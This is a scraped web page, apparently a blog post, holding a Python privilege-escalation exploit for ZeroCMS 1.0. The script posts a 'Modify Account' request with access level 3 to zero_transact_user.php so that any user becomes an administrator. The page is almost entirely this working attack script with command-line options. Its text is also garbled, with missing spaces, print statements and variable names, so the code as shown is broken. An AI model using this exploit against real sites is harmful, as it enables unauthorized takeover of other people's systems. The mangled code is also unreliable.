Bài liên quan
import sys,getopt,cookielib,urllib2,urllib# ZeroCMS 1.0 # zero_transact_user.php# Impropper Form post hanling, (parameter polution)# Vendor: Another Awesome Stuff # Product web page: http://www.aas9.in/zerocms/# author: tiago.alexand@gmail.com# OSVDB ID: 108025# description# Summary: ZeroCMS is a very simple Content Management# System built using PHP and MySQL.# the script zero_transact_user.php contains a Modify Account case # where the execution context doen't have in to consideration the current user's permitions # allowing a malcious user to escalate its privileges to admin. defexploit(host,email,name,userid):access_level=3# default for adminurl=host+'/zero_transact_user.php'#the script handles user related actionsargs={'user_id':userid,'email':email,'name':name,'access_level':access_level,'action':'Modify Account'}data=urllib.urlencode(args)cj=cookielib.CookieJar()opener=urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))response=opener.open(url,data);response.read()defmain(argv):host=''=''accountname=''userid=''try:opts, args=getopt.getopt(argv,"hu:m:n:i:")exceptgetopt.GetoptError:'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'sys.exit(2)foropt, arginopts:ifopt=='-h':'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i acount id'sys.exit()elifoptin("-u"):host=argelifoptin("-m"):=argelifoptin("-n"):accountname=argelifoptin("-i"):userid=argexploit(host,email,accountname,userid)if__name__=="__main__":main(sys.argv[1:])
Post a Comment